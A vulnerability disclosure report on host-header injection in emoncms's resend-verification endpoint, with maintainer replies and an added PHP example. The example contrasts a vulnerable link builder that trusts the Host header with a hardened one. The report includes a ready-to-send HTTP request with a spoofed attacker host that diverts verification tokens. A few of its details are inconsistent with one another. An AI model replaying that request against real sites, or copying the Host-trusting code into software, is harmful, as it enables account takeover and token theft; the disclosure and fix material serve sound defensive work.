Misinterpretation of Input in emoncms/dashboard


Reported on

Jul 22nd 2021

💥 BUG

Account takeover via host-header injection. It allows an attacker to change the URL of the account-verification link and verify any email address.


1. First, as the attacker, create an account with the email abc@gmail.com. You don't own that email address.
You can't log in until you verify that email address, but you are not the owner of that email.
Now the attacker sends the account-verify request below:

GET /user/resend-verify.json?&username=bounty HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://emonsdfcms.org/
Cookie: PHPSESSID=juvfp27bj0234ib10irro8a06e

In this request header, see that I put Host: attacker-domain.com and sent the request.
Now the victim's email address will receive a verification link like https://attacker-domain.com/user/verify?email=yagefix460@dedatre.com&key=49939b70ea5ee9979a67376d47d59a7b .
In this URL, see the attacker's domain. When the victim opens his mail and clicks that verification link, the verification code will be sent to attacker-domain.

We have contacted a member of the emoncms/dashboard team and are waiting to hear back 2 years ago
ranjit-git modified the report
2 years ago
An emoncms/dashboard maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
An emoncms/dashboard maintainer marked this as fixed with commit 58af4f 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
An emoncms/dashboard maintainer
2 years ago


I've fixed this vulnerability in the core emoncms/emoncms repository:


Thanks a lot for notifying me of this vulnerability!

An emoncms/dashboard maintainer
2 years ago


The fix suggests that the user sets their emoncms domain manually in the emoncms settings file, which ensures that $_SERVER['HOST'] is not used to discover the installation's domain name.
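Added example (not emoncms code, and not the maintainer's commit) contrasting the pattern the report describes with the fix described above: a verification link built from the request's Host header versus one built from an operator-configured origin. The settings key `emoncms_base_url`, the request array and the token are constructed for illustration.

```php
<?php
// Constructed request mirroring the report: the Host header is client-supplied.
$request = [
    'server' => ['HTTP_HOST' => 'attacker-domain.com', 'HTTPS' => 'on'],
    'email'  => 'victim@example.com',
    'key'    => 'REPLACE_WITH_RANDOM_TOKEN', // placeholder, not a real verification key
];

// Vulnerable pattern: the link's host is whatever the client sent in Host,
// so the victim's click delivers the key to that host instead of the real site.
function verify_link_from_host(array $server, string $email, string $key): string
{
    $scheme = (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
    return sprintf('%s://%s/user/verify?email=%s&key=%s',
        $scheme, $server['HTTP_HOST'], urlencode($email), urlencode($key));
}

// Hardened pattern: the public origin comes from a fixed setting the operator wrote
// (hypothetical key 'emoncms_base_url'); the request's Host header is never consulted.
function verify_link_from_config(array $settings, string $email, string $key): string
{
    $base = rtrim($settings['emoncms_base_url'], '/');
    if (!preg_match('#^https?://[A-Za-z0-9.-]+(:\d+)?$#', $base)) {
        throw new InvalidArgumentException('emoncms_base_url must be an absolute origin');
    }
    return sprintf('%s/user/verify?email=%s&key=%s', $base, urlencode($email), urlencode($key));
}

// Defender-side check: a Host header that differs from the configured origin is a
// useful signal to log, since legitimate browsers send the real site's hostname.
function host_header_matches(array $server, array $settings): bool
{
    $expected = parse_url($settings['emoncms_base_url'], PHP_URL_HOST) ?? '';
    return strcasecmp($server['HTTP_HOST'] ?? '', $expected) === 0;
}

$settings = ['emoncms_base_url' => 'https://emoncms.example.org']; // constructed operator config

echo "Vulnerable: ", verify_link_from_host($request['server'], $request['email'], $request['key']), "\n";
echo "Hardened:   ", verify_link_from_config($settings, $request['email'], $request['key']), "\n";
if (!host_header_matches($request['server'], $settings)) {
    error_log('Host header mismatch: ' . $request['server']['HTTP_HOST']);
}
```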
